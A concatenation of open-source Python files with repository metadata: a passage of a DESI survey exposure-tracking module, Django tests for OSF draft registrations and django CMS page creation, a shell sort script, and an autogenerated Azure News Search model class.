"""
if mjd_min and mjd_max and mjd_min >= mjd_max:
raise ValueError('Expected mjd_min < mjd_max.')
# Identify which exposures to drop.
mjd = self._table['mjd'].data
drop = (mjd == 0)
if mjd_min is not None:
drop |= (mjd < mjd_min)
if mjd_max is not None:
drop |= (mjd >= mjd_max)
# Copy our table.
table = self._table.copy()
# Zero dropped exposures.
for name in (
'mjd', 'exptime', 'snr2frac', 'airmass', 'seeing', 'transparency'):
table[name][drop] = 0.
# Recompute the status column.
snr2sum = table['snr2frac'].data.sum(axis=1)
assert np.all(snr2sum >= 0)
table['status'] = 1
table['status'][snr2sum == 0] = 0
table['status'][snr2sum >= self.min_snr2] = 2
if mjd_max is not None:
# Rewind the covered and available columns.
config = desisurvey.config.Configuration()
max_day_number = desisurvey.utils.day_number(mjd_max)
table['covered'][table['covered'] > max_day_number] = -1
table['available'][table['available'] > max_day_number] = -1
table['planned'][table['planned'] > max_day_number] = -1
# Return a new progress object with this table.
return Progress(restore=table)
def add_exposure(self, tile_id, start, exptime, snr2frac, airmass, seeing,
transparency, moonfrac, moonalt, moonsep):
"""Add a single exposure to the progress.
Parameters
----------
tile_id : int
DESI footprint tile ID
start : astropy.time.Time
Exposure start time. Must be after any previous exposure.
exptime : astropy.units.Quantity
Exposure open shutter time with units.
snr2frac : float
Fraction of the design SNR**2 achieved during this exposure.
airmass : float
Estimated airmass of this exposure.
seeing : float
Estimated FWHM seeing of this exposure in arcseconds.
transparency : float
Estimated atmospheric transparency of this exposure.
moonfrac : float
Moon illuminated fraction (0-1).
moonalt : float
Moon altitude angle in degrees.
moonsep : float
Moon-tile separation angle in degrees.
"""
mjd = start.mjd
self.log.info(
'Adding {0:.1f} exposure #{1:06d} of {2} at {3} (MJD {4:.5f}).'
.format(exptime, self.num_exp, tile_id, start.datetime, mjd))
row = self.get_tile(tile_id)
# Check that we have not reached the maximum allowed exposures.
num_exp = np.count_nonzero(row['mjd'] > 0)
if num_exp == self.max_exposures:
raise RuntimeError(
'Reached maximum exposure limit ({0}) for tile_id {1}.'
.format(self.max_exposures, tile_id))
# Check for increasing timestamps.
if mjd <= self._last_mjd:
raise ValueError('Exposure MJD {0:.5f} <= last MJD {1:.5f}.'
.format(mjd, self._last_mjd))
# Remember the most recent exposure.
self._last_mjd = mjd
self._last_tile = row
self._num_exp += 1
# Remember the first exposure's timestamp.
if self._first_mjd == 0:
self._first_mjd = mjd
# Save this exposure.
row['mjd'][num_exp] = mjd
row['exptime'][num_exp] = exptime.to(u.s).value
row['snr2frac'][num_exp] = snr2frac
row['airmass'][num_exp] = airmass
row['seeing'][num_exp] = seeing
row['transparency'][num_exp] = transparency
row['moonfrac'][num_exp] = moonfrac
row['moonalt'][num_exp] = moonalt
row['moonsep'][num_exp] = moonsep
# Update this tile's status.
row['status'] = 1 if row['snr2frac'].sum() < self.min_snr2 else 2
def get_exposures(self, start=None, stop=None,
tile_fields='tileid,pass,ra,dec,ebmv',
exp_fields=('night,mjd,exptime,seeing,transparency,' +
'airmass,moonfrac,moonalt,moonsep,' +
'program,flavor')):
"""Create a table listing exposures in time order.
Parameters
----------
start : date or None
First date to include in the list of exposures, or date of the
first observation if None.
stop : date or None
Last date to include in the list of exposures, or date of the
last observation if None.
tile_fields : str
Comma-separated list of per-tile field names to include. The
special name 'index' denotes the index into the visible tile array.
The special name 'ebmv' adds median E(B-V) values for each tile
from the tile design file.
exp_fields : str
Comma-separated list of per-exposure field names to include. The
            special name 'snr2cum' denotes the cumulative snr2frac on each
tile, since the start of the survey. The special name 'night'
denotes a string YYYYMMDD specifying the date on which each
night starts. The special name 'lst' denotes the apparent local
sidereal time of the shutter open timestamp. The special name
'expid' denotes the index of each exposure in the full progress
record starting from zero.
Returns
-------
astropy.table.Table
Table with the specified columns as uppercase and one row per exposure.
"""
# Get MJD range to show.
if start is None:
start = self.first_mjd
start = desisurvey.utils.local_noon_on_date(
desisurvey.utils.get_date(start)).mjd
if stop is None:
stop = self.last_mjd
stop = desisurvey.utils.local_noon_on_date(
desisurvey.utils.get_date(stop)).mjd + 1
if start >= stop:
raise ValueError('Expected start < stop.')
# Build a list of exposures in time sequence.
table = self._table
mjd = table['mjd'].data.flatten()
order = np.argsort(mjd)
tile_index = (order // self.max_exposures)
# Assign each exposure a sequential index starting from zero.
ntot = len(mjd)
nexp = np.count_nonzero(mjd > 0)
expid = np.empty(ntot, int)
expid[order] = np.arange(nexp - ntot, nexp)
# Restrict to the requested date range.
first, last = np.searchsorted(mjd, [start, stop], sorter=order)
tile_index = tile_index[first:last + 1]
order = order[first:last + 1]
assert np.all(expid[order] >= 0)
# Create the output table.
tileinfo = None
output = astropy.table.Table()
output.meta['EXTNAME'] = 'EXPOSURES'
for name in tile_fields.split(','):
name = name.lower()
if name == 'index':
output[name.upper()] = tile_index
elif name == 'ebmv':
if tileinfo is None:
config = desisurvey.config.Configuration()
tileinfo = astropy.table.Table(
desimodel.io.load_tiles(onlydesi=True, extra=False,
tilesfile=config.tiles_file()))
assert np.all(tileinfo['TILEID'] == table['tileid'])
output[name.upper()] = tileinfo['EBV_MED'][tile_index]
else:
if name not in table.colnames or len(table[name].shape) != 1:
raise ValueError(
'Invalid tile field name: {0}.'.format(name))
output[name.upper()] = table[name][tile_index]
for name in exp_fields.split(','):
name = name.lower()
if name == 'snr2cum':
snr2cum = np.cumsum(
table['snr2frac'], axis=1).flatten()[order]
output[name.upper()] = astropy.table.Column(
snr2cum, format='%.3f',
                    description='Cumulative fraction of target S/N**2')
elif name == 'night':
mjd = table['mjd'].flatten()[order]
night = np.empty(len(mjd), dtype=(str, 8))
for i in range(len(mjd)):
night[i] = str(desisurvey.utils.get_date(mjd[i])).replace('-', '')
output[name.upper()] = astropy.table.Column(
night,
description='Date at start of night when exposure taken')
elif name == 'lst':
mjd = table['mjd'].flatten()[order]
times = astropy.time.Time(
mjd, format='mjd', location=desisurvey.utils.get_location())
lst = times.sidereal_time('apparent').to(u.deg).value
output[name.upper()] = astropy.table.Column(
lst, format='%.1f', unit='deg',
description='Apparent local sidereal time in degrees')
elif name == 'program':
exppass = table['pass'][tile_index]
try:
from desimodel.footprint import pass2program
program = pass2program(exppass)
except ImportError:
#- desimodel < 0.9.1 doesn't have pass2program, so
#- hardcode the mapping that it did have
program = np.empty(len(exppass), dtype=(str, 6))
program[:] = 'BRIGHT'
program[exppass < 4] = 'DARK'
program[exppass == 4] = 'GRAY'
proglen = len(max(program, key=len))
if proglen < 6: # need at least six characters for 'CALIB' program
proglen = 6
output[name.upper()] = astropy.table.Column(program,
dtype='<U{}'.format(proglen),
description='Program name')
elif name == 'flavor':
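                # Note: this reuses exppass computed in the 'program'
                # branch above, so 'program' must precede 'flavor' in
                # exp_fields (as it does in the default field list).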
flavor = np.empty(len(exppass), dtype=(str, 7))
flavor[:] = 'science'
output[name.upper()] = astropy.table.Column(flavor,
description='Exposure flavor')
elif name == 'expid':
output[name.upper()] = astropy.table.Column(
expid[order], description='Exposure index')
else:
if name not in table.colnames or len(table[name].shape) != 2:
raise ValueError(
'Invalid exposure field name: {0}.'.format(name))
output[name.upper()] = table[name].flatten()[order]
return output
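A usage sketch for this class (hypothetical values; it assumes a configured desisurvey/desimodel environment with the standard tile and configuration files available):

```python
import astropy.time
import astropy.units as u

progress = Progress()                    # fresh table covering all tiles
tile_id = progress._table['tileid'][0]   # any valid DESI tile ID

progress.add_exposure(
    tile_id, start=astropy.time.Time('2020-01-01 03:00'),
    exptime=1000. * u.s, snr2frac=0.6, airmass=1.2, seeing=1.1,
    transparency=0.9, moonfrac=0.3, moonalt=-10., moonsep=90.)

# 0.6 of one tile completed so far (include_partial=True by default).
print(progress.completed(as_tuple=True))
```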
| desihub/desisurvey | py/desisurvey/old/progress.py | Python | bsd-3-clause | 26,909 |
import pytest
from django.utils import timezone
from api.base.settings.defaults import API_BASE
from django.contrib.auth.models import Permission
from osf.models import RegistrationSchema
from osf_tests.factories import (
ProjectFactory,
RegistrationFactory,
AuthUserFactory,
CollectionFactory,
DraftRegistrationFactory,
)
from osf.utils import permissions
from website.project.metadata.schemas import LATEST_SCHEMA_VERSION
from website.project.metadata.utils import create_jsonschema_from_metaschema
@pytest.mark.django_db
class DraftRegistrationTestCase:
@pytest.fixture()
def user(self):
return AuthUserFactory()
@pytest.fixture()
def user_write_contrib(self):
return AuthUserFactory()
@pytest.fixture()
def user_read_contrib(self):
return AuthUserFactory()
@pytest.fixture()
def user_non_contrib(self):
return AuthUserFactory()
@pytest.fixture()
def project_public(self, user, user_write_contrib, user_read_contrib):
project_public = ProjectFactory(is_public=True, creator=user)
project_public.add_contributor(
user_write_contrib,
permissions=[permissions.WRITE])
project_public.add_contributor(
user_read_contrib,
permissions=[permissions.READ])
project_public.save()
return project_public
@pytest.fixture()
def prereg_metadata(self):
def metadata(draft):
test_metadata = {}
json_schema = create_jsonschema_from_metaschema(
draft.registration_schema.schema)
for key, value in json_schema['properties'].iteritems():
response = 'Test response'
if value['properties']['value'].get('enum'):
response = value['properties']['value']['enum'][0]
if value['properties']['value'].get('properties'):
response = {'question': {'value': 'Test Response'}}
test_metadata[key] = {'value': response}
return test_metadata
return metadata
@pytest.mark.django_db
class TestDraftRegistrationList(DraftRegistrationTestCase):
@pytest.fixture()
def schema(self):
return RegistrationSchema.objects.get(
name='Open-Ended Registration',
schema_version=LATEST_SCHEMA_VERSION)
@pytest.fixture()
def draft_registration(self, user, project_public, schema):
return DraftRegistrationFactory(
initiator=user,
registration_schema=schema,
branched_from=project_public
)
@pytest.fixture()
def url_draft_registrations(self, project_public):
return '/{}nodes/{}/draft_registrations/'.format(
API_BASE, project_public._id)
def test_admin_can_view_draft_list(
self, app, user, draft_registration,
schema, url_draft_registrations):
res = app.get(url_draft_registrations, auth=user.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 1
assert data[0]['attributes']['registration_supplement'] == schema._id
assert data[0]['id'] == draft_registration._id
assert data[0]['attributes']['registration_metadata'] == {}
def test_cannot_view_draft_list(
self, app, user_write_contrib,
user_read_contrib, user_non_contrib,
url_draft_registrations):
# test_read_only_contributor_cannot_view_draft_list
res = app.get(
url_draft_registrations,
auth=user_read_contrib.auth,
expect_errors=True)
assert res.status_code == 403
# test_read_write_contributor_cannot_view_draft_list
res = app.get(
url_draft_registrations,
auth=user_write_contrib.auth,
expect_errors=True)
assert res.status_code == 403
# test_logged_in_non_contributor_cannot_view_draft_list
res = app.get(
url_draft_registrations,
auth=user_non_contrib.auth,
expect_errors=True)
assert res.status_code == 403
# test_unauthenticated_user_cannot_view_draft_list
res = app.get(url_draft_registrations, expect_errors=True)
assert res.status_code == 401
def test_deleted_draft_registration_does_not_show_up_in_draft_list(
self, app, user, draft_registration, url_draft_registrations):
draft_registration.deleted = timezone.now()
draft_registration.save()
res = app.get(url_draft_registrations, auth=user.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 0
def test_draft_with_registered_node_does_not_show_up_in_draft_list(
self, app, user, project_public, draft_registration, url_draft_registrations):
reg = RegistrationFactory(project=project_public)
draft_registration.registered_node = reg
draft_registration.save()
res = app.get(url_draft_registrations, auth=user.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 0
def test_draft_with_deleted_registered_node_shows_up_in_draft_list(
self, app, user, project_public,
draft_registration, schema,
url_draft_registrations):
reg = RegistrationFactory(project=project_public)
draft_registration.registered_node = reg
draft_registration.save()
reg.is_deleted = True
reg.save()
res = app.get(url_draft_registrations, auth=user.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 1
assert data[0]['attributes']['registration_supplement'] == schema._id
assert data[0]['id'] == draft_registration._id
assert data[0]['attributes']['registration_metadata'] == {}
@pytest.mark.django_db
@pytest.mark.enable_quickfiles_creation
class TestDraftRegistrationCreate(DraftRegistrationTestCase):
@pytest.fixture()
def metaschema_open_ended(self):
return RegistrationSchema.objects.get(
name='Open-Ended Registration',
schema_version=LATEST_SCHEMA_VERSION)
@pytest.fixture()
def payload(self, metaschema_open_ended):
return {
'data': {
'type': 'draft_registrations',
'attributes': {
'registration_supplement': metaschema_open_ended._id
}
}
}
@pytest.fixture()
def url_draft_registrations(self, project_public):
return '/{}nodes/{}/draft_registrations/'.format(
API_BASE, project_public._id)
def test_type_is_draft_registrations(
self, app, user, metaschema_open_ended,
url_draft_registrations):
draft_data = {
'data': {
'type': 'nodes',
'attributes': {
'registration_supplement': metaschema_open_ended._id
}
}
}
res = app.post_json_api(
url_draft_registrations,
draft_data, auth=user.auth,
expect_errors=True)
assert res.status_code == 409
def test_admin_can_create_draft(
self, app, user, project_public,
payload, metaschema_open_ended):
url = '/{}nodes/{}/draft_registrations/?embed=branched_from&embed=initiator'.format(
API_BASE, project_public._id)
res = app.post_json_api(url, payload, auth=user.auth)
assert res.status_code == 201
data = res.json['data']
assert data['attributes']['registration_supplement'] == metaschema_open_ended._id
assert data['attributes']['registration_metadata'] == {}
assert data['embeds']['branched_from']['data']['id'] == project_public._id
assert data['embeds']['initiator']['data']['id'] == user._id
def test_cannot_create_draft(
self, app, user_write_contrib,
user_read_contrib, user_non_contrib,
project_public, payload,
url_draft_registrations):
# test_write_only_contributor_cannot_create_draft
assert user_write_contrib in project_public.contributors.all()
res = app.post_json_api(
url_draft_registrations,
payload,
auth=user_write_contrib.auth,
expect_errors=True)
assert res.status_code == 403
# test_read_only_contributor_cannot_create_draft
assert user_read_contrib in project_public.contributors.all()
res = app.post_json_api(
url_draft_registrations,
payload,
auth=user_read_contrib.auth,
expect_errors=True)
assert res.status_code == 403
# test_non_authenticated_user_cannot_create_draft
res = app.post_json_api(
url_draft_registrations,
payload, expect_errors=True)
assert res.status_code == 401
# test_logged_in_non_contributor_cannot_create_draft
res = app.post_json_api(
url_draft_registrations,
payload,
auth=user_non_contrib.auth,
expect_errors=True)
assert res.status_code == 403
def test_registration_supplement_errors(
self, app, user, url_draft_registrations):
# test_registration_supplement_not_found
draft_data = {
'data': {
'type': 'draft_registrations',
'attributes': {
'registration_supplement': 'Invalid schema'
}
}
}
res = app.post_json_api(
url_draft_registrations,
draft_data, auth=user.auth,
expect_errors=True)
assert res.status_code == 404
# test_registration_supplement_must_be_active_metaschema
schema = RegistrationSchema.objects.get(
name='Election Research Preacceptance Competition', active=False)
draft_data = {
'data': {
'type': 'draft_registrations',
'attributes': {
'registration_supplement': schema._id
}
}
}
res = app.post_json_api(
url_draft_registrations,
draft_data, auth=user.auth,
expect_errors=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Registration supplement must be an active schema.'
# test_registration_supplement_must_be_most_recent_metaschema
schema = RegistrationSchema.objects.get(
name='Open-Ended Registration', schema_version=1)
draft_data = {
'data': {
'type': 'draft_registrations',
'attributes': {
'registration_supplement': schema._id
}
}
}
res = app.post_json_api(
url_draft_registrations,
draft_data, auth=user.auth,
expect_errors=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Registration supplement must be an active schema.'
def test_cannot_create_draft_errors(
self, app, user, project_public, payload):
# test_cannot_create_draft_from_a_registration
registration = RegistrationFactory(
project=project_public, creator=user)
url = '/{}nodes/{}/draft_registrations/'.format(
API_BASE, registration._id)
res = app.post_json_api(
url, payload, auth=user.auth,
expect_errors=True)
assert res.status_code == 404
# test_cannot_create_draft_from_deleted_node
project = ProjectFactory(is_public=True, creator=user)
project.is_deleted = True
project.save()
url_project = '/{}nodes/{}/draft_registrations/'.format(
API_BASE, project._id)
res = app.post_json_api(
url_project, payload,
auth=user.auth, expect_errors=True)
assert res.status_code == 410
assert res.json['errors'][0]['detail'] == 'The requested node is no longer available.'
# test_cannot_create_draft_from_collection
collection = CollectionFactory(creator=user)
url = '/{}nodes/{}/draft_registrations/'.format(
API_BASE, collection._id)
res = app.post_json_api(
url, payload, auth=user.auth,
expect_errors=True)
assert res.status_code == 404
def test_required_metaschema_questions_not_required_on_post(
self, app, user, project_public, prereg_metadata):
prereg_schema = RegistrationSchema.objects.get(
name='Prereg Challenge',
schema_version=LATEST_SCHEMA_VERSION)
prereg_draft_registration = DraftRegistrationFactory(
initiator=user,
registration_schema=prereg_schema,
branched_from=project_public
)
url = '/{}nodes/{}/draft_registrations/?embed=initiator&embed=branched_from'.format(
API_BASE, project_public._id)
registration_metadata = prereg_metadata(prereg_draft_registration)
del registration_metadata['q1']
prereg_draft_registration.registration_metadata = registration_metadata
prereg_draft_registration.save()
payload = {
'data': {
'type': 'draft_registrations',
'attributes': {
'registration_supplement': prereg_schema._id,
'registration_metadata': registration_metadata
}
}
}
res = app.post_json_api(
url, payload, auth=user.auth,
expect_errors=True)
assert res.status_code == 201
data = res.json['data']
assert res.json['data']['attributes']['registration_metadata']['q2']['value'] == 'Test response'
assert data['attributes']['registration_supplement'] == prereg_schema._id
assert data['embeds']['branched_from']['data']['id'] == project_public._id
assert data['embeds']['initiator']['data']['id'] == user._id
def test_registration_supplement_must_be_supplied(
self, app, user, url_draft_registrations):
draft_data = {
'data': {
'type': 'draft_registrations',
'attributes': {
}
}
}
res = app.post_json_api(
url_draft_registrations,
draft_data, auth=user.auth,
expect_errors=True)
errors = res.json['errors'][0]
assert res.status_code == 400
assert errors['detail'] == 'This field is required.'
assert errors['source']['pointer'] == '/data/attributes/registration_supplement'
def test_registration_metadata_must_be_a_dictionary(
self, app, user, payload, url_draft_registrations):
payload['data']['attributes']['registration_metadata'] = 'Registration data'
res = app.post_json_api(
url_draft_registrations,
payload, auth=user.auth,
expect_errors=True)
errors = res.json['errors'][0]
assert res.status_code == 400
assert errors['source']['pointer'] == '/data/attributes/registration_metadata'
assert errors['detail'] == 'Expected a dictionary of items but got type "unicode".'
def test_registration_metadata_question_values_must_be_dictionaries(
self, app, user, payload, url_draft_registrations):
schema = RegistrationSchema.objects.get(
name='OSF-Standard Pre-Data Collection Registration',
schema_version=LATEST_SCHEMA_VERSION)
payload['data']['attributes']['registration_supplement'] = schema._id
payload['data']['attributes']['registration_metadata'] = {}
payload['data']['attributes']['registration_metadata']['datacompletion'] = 'No, data collection has not begun'
res = app.post_json_api(
url_draft_registrations,
payload, auth=user.auth,
expect_errors=True)
errors = res.json['errors'][0]
assert res.status_code == 400
assert errors['detail'] == 'u\'No, data collection has not begun\' is not of type \'object\''
def test_registration_metadata_question_keys_must_be_value(
self, app, user, payload, url_draft_registrations):
schema = RegistrationSchema.objects.get(
name='OSF-Standard Pre-Data Collection Registration',
schema_version=LATEST_SCHEMA_VERSION)
payload['data']['attributes']['registration_supplement'] = schema._id
payload['data']['attributes']['registration_metadata'] = {}
payload['data']['attributes']['registration_metadata']['datacompletion'] = {
'incorrect_key': 'No, data collection has not begun'}
res = app.post_json_api(
url_draft_registrations,
payload, auth=user.auth,
expect_errors=True)
errors = res.json['errors'][0]
assert res.status_code == 400
assert errors['detail'] == 'Additional properties are not allowed (u\'incorrect_key\' was unexpected)'
def test_question_in_registration_metadata_must_be_in_schema(
self, app, user, payload, url_draft_registrations):
schema = RegistrationSchema.objects.get(
name='OSF-Standard Pre-Data Collection Registration',
schema_version=LATEST_SCHEMA_VERSION)
payload['data']['attributes']['registration_supplement'] = schema._id
payload['data']['attributes']['registration_metadata'] = {}
payload['data']['attributes']['registration_metadata']['q11'] = {
'value': 'No, data collection has not begun'
}
res = app.post_json_api(
url_draft_registrations,
payload, auth=user.auth,
expect_errors=True)
errors = res.json['errors'][0]
assert res.status_code == 400
assert errors['detail'] == 'Additional properties are not allowed (u\'q11\' was unexpected)'
def test_multiple_choice_question_value_must_match_value_in_schema(
self, app, user, payload, url_draft_registrations):
schema = RegistrationSchema.objects.get(
name='OSF-Standard Pre-Data Collection Registration',
schema_version=LATEST_SCHEMA_VERSION)
payload['data']['attributes']['registration_supplement'] = schema._id
payload['data']['attributes']['registration_metadata'] = {}
payload['data']['attributes']['registration_metadata']['datacompletion'] = {
'value': 'Nope, data collection has not begun'}
res = app.post_json_api(
url_draft_registrations,
payload, auth=user.auth,
expect_errors=True)
errors = res.json['errors'][0]
assert res.status_code == 400
assert errors['detail'] == 'u\'Nope, data collection has not begun\' is not one of [u\'No, data collection has not begun\', u\'Yes, data collection is underway or complete\']'
def test_reviewer_cannot_create_draft_registration(
self, app, user_read_contrib, project_public,
payload, url_draft_registrations):
user = AuthUserFactory()
administer_permission = Permission.objects.get(
codename='administer_prereg')
user.user_permissions.add(administer_permission)
user.save()
assert user_read_contrib in project_public.contributors.all()
res = app.post_json_api(
url_draft_registrations,
payload, auth=user.auth,
expect_errors=True)
assert res.status_code == 403
| erinspace/osf.io | api_tests/nodes/views/test_node_draft_registration_list.py | Python | apache-2.0 | 19,847 |
from __future__ import with_statement
import sys
from django.contrib.auth.models import Permission
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import FieldError
from django.template import TemplateDoesNotExist
from django.test.testcases import TestCase
from djangocms_text_ckeditor.cms_plugins import TextPlugin
from djangocms_text_ckeditor.models import Text
from menus.menu_pool import menu_pool
from cms.api import _generate_valid_slug, create_page, _verify_plugin_type, assign_user_to_page
from cms.apphook_pool import apphook_pool
from cms.constants import TEMPLATE_INHERITANCE_MAGIC
from cms.models.pagemodel import Page
from cms.plugin_base import CMSPluginBase
from cms.test_utils.util.context_managers import SettingsOverride
from cms.test_utils.util.menu_extender import TestMenu
from cms.test_utils.util.mock import AttributeObject
from cms.tests.apphooks import APP_MODULE, APP_NAME
from cms.utils.compat.dj import get_user_model
def _grant_page_permission(user, codename):
content_type = ContentType.objects.get_by_natural_key('cms', 'page')
perm = Permission.objects.get_or_create(codename='%s_page' % codename,
content_type=content_type)[0]
user.user_permissions.add(perm)
class PythonAPITests(TestCase):
def _get_default_create_page_arguments(self):
return {
'title': 'Test',
'template': 'nav_playground.html',
'language': 'en'
}
def test_generate_valid_slug(self):
title = "Hello Title"
expected_slug = "hello-title"
# empty db, it should just slugify
slug = _generate_valid_slug(title, None, 'en')
self.assertEqual(slug, expected_slug)
    def test_generate_valid_slug_check_existing(self):
title = "Hello Title"
create_page(title, 'nav_playground.html', 'en')
# second time with same title, it should append -1
expected_slug = "hello-title-1"
slug = _generate_valid_slug(title, None, 'en')
self.assertEqual(slug, expected_slug)
    def test_generate_valid_slug_check_parent(self):
title = "Hello Title"
page = create_page(title, 'nav_playground.html', 'en')
        # same title, but nested under a parent page, so no suffix is appended
expected_slug = "hello-title"
slug = _generate_valid_slug(title, page, 'en')
self.assertEqual(slug, expected_slug)
    def test_generate_valid_slug_check_parent_existing(self):
title = "Hello Title"
page = create_page(title, 'nav_playground.html', 'en')
create_page(title, 'nav_playground.html', 'en', parent=page)
# second time with same title, it should append -1
expected_slug = "hello-title-1"
slug = _generate_valid_slug(title, page, 'en')
self.assertEqual(slug, expected_slug)
def test_invalid_apphook_type(self):
self.assertRaises(TypeError, create_page, apphook=1,
**self._get_default_create_page_arguments())
def test_invalid_template(self):
kwargs = self._get_default_create_page_arguments()
kwargs['template'] = "not_valid.htm"
with SettingsOverride(CMS_TEMPLATES=(("not_valid.htm", "notvalid"),)):
self.assertRaises(TemplateDoesNotExist, create_page, **kwargs)
kwargs['template'] = TEMPLATE_INHERITANCE_MAGIC
create_page(**kwargs)
def test_apphook_by_class(self):
if APP_MODULE in sys.modules:
del sys.modules[APP_MODULE]
apphooks = (
'%s.%s' % (APP_MODULE, APP_NAME),
)
with SettingsOverride(CMS_APPHOOKS=apphooks):
apphook_pool.clear()
apphook = apphook_pool.get_apphook(APP_NAME)
page = create_page(apphook=apphook,
**self._get_default_create_page_arguments())
self.assertEqual(page.get_application_urls('en'), APP_NAME)
def test_invalid_dates(self):
self.assertRaises(AssertionError, create_page, publication_date=1,
**self._get_default_create_page_arguments())
self.assertRaises(AssertionError, create_page, publication_end_date=1,
**self._get_default_create_page_arguments())
def test_nav_extenders_invalid_type(self):
if not menu_pool.discovered:
menu_pool.discover_menus()
self.old_menu = menu_pool.menus
menu_pool.menus = {'TestMenu': TestMenu()}
self.assertRaises(AssertionError, create_page, navigation_extenders=1,
**self._get_default_create_page_arguments())
menu_pool.menus = self.old_menu
def test_nav_extenders_invalid_menu(self):
if not menu_pool.discovered:
menu_pool.discover_menus()
self.old_menu = menu_pool.menus
menu_pool.menus = {}
self.assertRaises(AssertionError, create_page,
navigation_extenders=TestMenu,
**self._get_default_create_page_arguments())
menu_pool.menus = self.old_menu
def test_nav_extenders_valid(self):
if not menu_pool.discovered:
menu_pool.discover_menus()
self.old_menu = menu_pool.menus
menu_pool.menus = {'TestMenu': TestMenu()}
page = create_page(navigation_extenders='TestMenu',
**self._get_default_create_page_arguments())
self.assertEqual(page.navigation_extenders, 'TestMenu')
menu_pool.menus = self.old_menu
def test_verify_plugin_type_invalid_type(self):
self.assertRaises(TypeError, _verify_plugin_type, 1)
def test_verify_plugin_type_string(self):
plugin_model, plugin_type = _verify_plugin_type("TextPlugin")
self.assertEqual(plugin_model, Text)
self.assertEqual(plugin_type, 'TextPlugin')
def test_verify_plugin_type_string_invalid(self):
self.assertRaises(TypeError, _verify_plugin_type, "InvalidPlugin")
def test_verify_plugin_type_plugin_class(self):
plugin_model, plugin_type = _verify_plugin_type(TextPlugin)
self.assertEqual(plugin_model, Text)
self.assertEqual(plugin_type, 'TextPlugin')
def test_verify_plugin_type_invalid_plugin_class(self):
class InvalidPlugin(CMSPluginBase):
model = Text
self.assertRaises(AssertionError, _verify_plugin_type, InvalidPlugin)
def test_assign_user_to_page_nothing(self):
page = create_page(**self._get_default_create_page_arguments())
user = get_user_model().objects.create_user(username='user', email='[email protected]',
password='user')
user.is_staff = True
request = AttributeObject(user=user)
self.assertFalse(page.has_change_permission(request))
def test_assign_user_to_page_single(self):
page = create_page(**self._get_default_create_page_arguments())
user = get_user_model().objects.create_user(username='user', email='[email protected]',
password='user')
user.is_staff = True
user.save()
request = AttributeObject(user=user)
assign_user_to_page(page, user, can_change=True)
self.assertFalse(page.has_change_permission(request))
self.assertFalse(page.has_add_permission(request))
_grant_page_permission(user, 'change')
page = Page.objects.get(pk=page.pk)
user = get_user_model().objects.get(pk=user.pk)
request = AttributeObject(user=user)
self.assertTrue(page.has_change_permission(request))
self.assertFalse(page.has_add_permission(request))
def test_assign_user_to_page_all(self):
page = create_page(**self._get_default_create_page_arguments())
user = get_user_model().objects.create_user(username='user', email='[email protected]',
password='user')
user.is_staff = True
user.save()
request = AttributeObject(user=user)
assign_user_to_page(page, user, grant_all=True)
self.assertFalse(page.has_change_permission(request))
self.assertTrue(page.has_add_permission(request))
_grant_page_permission(user, 'change')
_grant_page_permission(user, 'add')
page = Page.objects.get(pk=page.pk)
user = get_user_model().objects.get(pk=user.pk)
request = AttributeObject(user=user)
self.assertTrue(page.has_change_permission(request))
self.assertTrue(page.has_add_permission(request))
def test_page_overwrite_url_default(self):
self.assertEqual(Page.objects.all().count(), 0)
home = create_page('home', 'nav_playground.html', 'en', published=True)
self.assertTrue(home.is_published('en', True))
self.assertTrue(home.is_home)
page = create_page(**self._get_default_create_page_arguments())
self.assertFalse(page.is_home)
self.assertFalse(page.get_title_obj_attribute('has_url_overwrite'))
self.assertEqual(page.get_title_obj_attribute('path'), 'test')
def test_create_page_can_overwrite_url(self):
page_attrs = self._get_default_create_page_arguments()
page_attrs["overwrite_url"] = 'test/home'
page = create_page(**page_attrs)
self.assertTrue(page.get_title_obj_attribute('has_url_overwrite'))
self.assertEqual(page.get_title_obj_attribute('path'), 'test/home')
def test_create_reverse_id_collision(self):
create_page('home', 'nav_playground.html', 'en', published=True, reverse_id="foo")
self.assertRaises(FieldError, create_page, 'foo', 'nav_playground.html', 'en', published=True, reverse_id="foo")
        self.assertEqual(Page.objects.count(), 2)
| amaozhao/basecms | cms/tests/api.py | Python | mit | 9,853 |
import random
def shellSort(array):
    n = len(array)
    gap = n // 2  # start with a large gap, then halve it after every pass
    while gap > 0:
        # gapped insertion sort: keep elements that are `gap` apart in order
        for i in range(gap, n):
            temp = array[i]
            j = i
            while j >= gap and array[j-gap] > temp:
                array[j] = array[j-gap]
                j -= gap
            array[j] = temp
        gap //= 2  # integer division keeps gap an int, as range() requires
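# Quick sanity check (illustrative):
#   data = [5, 2, 9, 1]
#   shellSort(data)   # data is sorted in place to [1, 2, 5, 9]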
array = []
for i in range(0, 1000000):
    array.append(random.randint(1, 1000000))
shellSort(array)
print(array[0])
| parcpaes/cplus | vectors/shellSort.py | Python | lgpl-2.1 | 459 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .thing import Thing
class Organization(Thing):
"""Defines an organization.
Variables are only populated by the server, and will be ignored when
sending a request.
:param _type: Constant filled by server.
:type _type: str
:ivar id: A String identifier.
:vartype id: str
    :ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by
this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image:
~azure.cognitiveservices.search.newssearch.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
    :ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
"""
_validation = {
'_type': {'required': True},
'id': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
}
def __init__(self):
super(Organization, self).__init__()
self._type = 'Organization'
| lmazuel/azure-sdk-for-python | azure-cognitiveservices-search-newssearch/azure/cognitiveservices/search/newssearch/models/organization.py | Python | mit | 1,967 |
